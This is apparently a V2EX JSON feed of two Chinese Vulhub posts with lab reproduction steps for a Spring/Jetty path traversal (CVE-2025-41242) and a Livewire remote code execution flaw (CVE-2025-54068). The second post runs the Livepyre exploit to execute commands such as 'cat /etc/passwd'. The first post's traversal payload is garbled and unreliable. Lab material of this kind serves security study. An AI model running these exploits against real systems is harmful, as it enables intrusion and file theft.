{ "version": "https://jsonfeed.org/version/1", "title": "Vulhub", "description": "Vulhub \u662f\u4e00\u4e2a\u5f00\u6e90\u7684 Docker \u73af\u5883\u96c6\u5408\uff0c\u5176\u4e2d\u5305\u542b\u5927\u91cf\u9884\u6784\u5efa\u7684\u3001\u5373\u7528\u578b\u7684\u6613\u53d7\u653b\u51fb Docker \u73af\u5883\u3002\u53ea\u9700\u4e00\u6761\u547d\u4ee4\uff0c\u5373\u53ef\u542f\u52a8\u4e00\u4e2a\u6613\u53d7\u653b\u51fb\u7684\u73af\u5883\uff0c\u7528\u4e8e\u5b89\u5168\u7814\u7a76\u3001\u5b66\u4e60\u6216\u6f14\u793a\uff0c\u65e0\u9700\u4efb\u4f55 Docker \u4f7f\u7528\u7ecf\u9a8c\u3002", "home_page_url": "https://www.v2ex.com/go/vulhub", "feed_url": "https://www.v2ex.com/feed/vulhub.json", "icon": "https://cdn.v2ex.com/navatar/f473/3064/1182_large.png?m=1768049906", "favicon": "https://cdn.v2ex.com/navatar/f473/3064/1182_normal.png?m=1768049906", "items": [ { "author": { "url": "https://www.v2ex.com/member/phithon", "name": "phithon", "avatar": "https://cdn.v2ex.com/avatar/2bc0/b213/47978_large.png?m=1775936933" }, "url": "https://www.v2ex.com/t/1209893", "title": "CVE-2025-41242 - Spring + Jetty \u5bfc\u81f4\u7684\u6709\u8da3\u6f0f\u6d1e", "id": "https://www.v2ex.com/t/1209893", "date_published": "2026-05-01T13:25:28+00:00", "content_html": "

CVE-2025-41242 \u662f\u4e00\u4e2a\u51fa\u73b0\u5728 Spring Framework + Jetty 12 \u7ec4\u5408\u4e0a\u7684 \u8def\u5f84\u7a7f\u8d8a (path traversal) \u6f0f\u6d1e\uff0c\u653b\u51fb\u8005\u53d1\u9001/\u962e\u4e25\u7075\u4e30\u4e30\u7532\u6765/\u962e\u4e25\u7075\u4e30\u4e30\u7532\u6765/\u962e\u4e25\u7075\u4e30\u4e30\u7532\u6765/\u962e\u4e25\u7075\u4e30\u4e30\u7532\u6765/\u962e\u4e25\u7075\u4e30\u4e30\u7532\u6765/\u962e\u4e25\u7075\u4e30\u4e30\u7532\u6765/\u962e\u4e25\u7075\u4e30\u4e30\u7532\u6765/etc/passw%64\u8fd9\u6837\u7684\u6570\u636e\u5305\u5373\u53ef\u8bfb\u53d6\u5230\u8d44\u6e90\u76ee\u5f55\u4ee5\u5916\u7684\u6587\u4ef6\uff0c\u6f0f\u6d1e\u539f\u7406\u5206\u6790\uff1ahttps://github.com/vulhub/vulhub/discussions/777

\n

\u4f60\u53ef\u4ee5\u4f7f\u7528https://github.com/vulhub/vulhub/tree/master/spring/CVE-2025-41242\u6765\u590d\u73b0\u8fd9\u4e2a\u6f0f\u6d1e

\n" }, { "author": { "url": "https://www.v2ex.com/member/phithon", "name": "phithon", "avatar": "https://cdn.v2ex.com/avatar/2bc0/b213/47978_large.png?m=1775936933" }, "url": "https://www.v2ex.com/t/1184510", "date_modified": "2026-01-10T13:15:50+00:00", "content_html": "

Livewire \u662f\u4e00\u4e2a\u7528\u4e8e Laravel \u7684\u5168\u6808\u6846\u67b6\uff0c\u53ef\u4ee5\u5728\u4e0d\u79bb\u5f00 Laravel \u7684\u60c5\u51b5\u4e0b\u8f7b\u677e\u6784\u5efa\u52a8\u6001 Web \u754c\u9762\u3002

\n

\u5728 3.6.4 \u7248\u672c\u4e4b\u524d\u7684 Livewire \u5b58\u5728\u4e00\u4e2a\u4e25\u91cd\u7684\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff08 CVE-2025-54068 \uff09\u3002\u8be5\u6f0f\u6d1e\u662f\u7531\u4e8e\u7ec4\u4ef6\u5c5e\u6027\u66f4\u65b0\u6c34\u5408\uff08 hydration \uff09\u8fc7\u7a0b\u4e2d\u5bf9\u4ee3\u7801\u751f\u6210\u7684\u63a7\u5236\u4e0d\u5f53\u5bfc\u81f4\u7684\u3002\u5f53 Livewire \u7ec4\u4ef6\u5904\u7406\u6765\u81ea\u5feb\u7167\uff08 snapshot \uff09\u7684\u7528\u6237\u8f93\u5165\u65f6\uff0c\u6846\u67b6\u672a\u80fd\u6b63\u786e\u8fc7\u6ee4\u5bf9\u8c61\u7c7b\u578b\uff0c\u5bfc\u81f4\u653b\u51fb\u8005\u53ef\u4ee5\u6ce8\u5165\u6076\u610f\u8f7d\u8377\u5e76\u5728\u670d\u52a1\u5668\u4e0a\u6267\u884c\u3002\u5982\u679c\u653b\u51fb\u8005\u77e5\u9053 Laravel \u5e94\u7528\u7684APP_KEY\uff0c\u5219\u5229\u7528\u8fc7\u7a0b\u4f1a\u66f4\u52a0\u7b80\u5355\u3002

\n

\u53c2\u8003\u94fe\u63a5\uff1a

\n\n

\u73af\u5883\u642d\u5efa

\n

\u5728 Vulhub \u73af\u5883\u4e0b\uff0c\u8fdb\u5165 livewire/CVE-2025-54068 \u76ee\u5f55\uff0c\u6267\u884c\u5982\u4e0b\u547d\u4ee4\u542f\u52a8 Livewire 3.6.3 \u6f0f\u6d1e\u73af\u5883\uff1a

\n
docker compose up -d\n
\n

\u670d\u52a1\u542f\u52a8\u540e\uff0c\u8bbf\u95eehttp://your-ip:8080/\u53ef\u4ee5\u770b\u5230\u4e00\u4e2a\u793a\u4f8b\u7684 Todo List \u5e94\u7528\u3002

\n

\u6f0f\u6d1e\u590d\u73b0

\n

\u53ef\u4ee5\u4f7f\u7528 @remsio \u548c @Worty \u5f00\u53d1\u7684 Livepyre \u5de5\u5177\u6765\u590d\u73b0\u8be5\u6f0f\u6d1e\u3002\u9996\u5148\u514b\u9686\u4ed3\u5e93\u5e76\u5b89\u88c5\u4f9d\u8d56\uff1a

\n
git clone https://github.com/synacktiv/Livepyre.git\ncd Livepyre\npip install -r requirements.txt\n
\n

\u7136\u540e\u5bf9\u76ee\u6807\u8fd0\u884c\u6f0f\u6d1e\u5229\u7528\u7a0b\u5e8f\u3002\u8be5\u5de5\u5177\u4f1a\u81ea\u52a8\u68c0\u6d4b Livewire \u7248\u672c\u3001\u67e5\u627e\u53ef\u7528\u7684\u5feb\u7167\uff0c\u5e76\u5c1d\u8bd5\u5728\u4e0d\u9700\u8981APP_KEY\u7684\u60c5\u51b5\u4e0b\u5229\u7528\u8be5\u6f0f\u6d1e\uff1a

\n
python Livepyre.py -u http://your-ip:8080/ -f system -p \"id\"\n
\n

\u5de5\u5177\u4f1a\u68c0\u67e5\u5feb\u7167\u4e2d\u662f\u5426\u5b58\u5728\u5bf9\u8c61\u7c7b\u578b\u7684\u53c2\u6570\u3002\u5982\u679c\u5b58\u5728\uff0c\u5219\u76f4\u63a5\u89e6\u53d1 RCE \uff1b\u5426\u5219\u4f1a\u5c1d\u8bd5\u66b4\u529b\u7834\u89e3\u53c2\u6570\u3002\u4f60\u4e5f\u53ef\u4ee5\u6267\u884c\u5176\u4ed6\u547d\u4ee4\uff0c\u6bd4\u5982\u8bfb\u53d6/etc/passwd\u6587\u4ef6\uff1a

\n
python Livepyre.py -u http://your-ip:8080/ -f system -p \"cat /etc/passwd\"\n
\n

\"\"

\n", "date_published": "2026-01-10T13:10:02+00:00", "title": "Laravel Livewire \u7ec4\u4ef6\u5c5e\u6027\u6c34\u5408\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff08CVE-2025-54068\uff09", "id": "https://www.v2ex.com/t/1184510" } ] }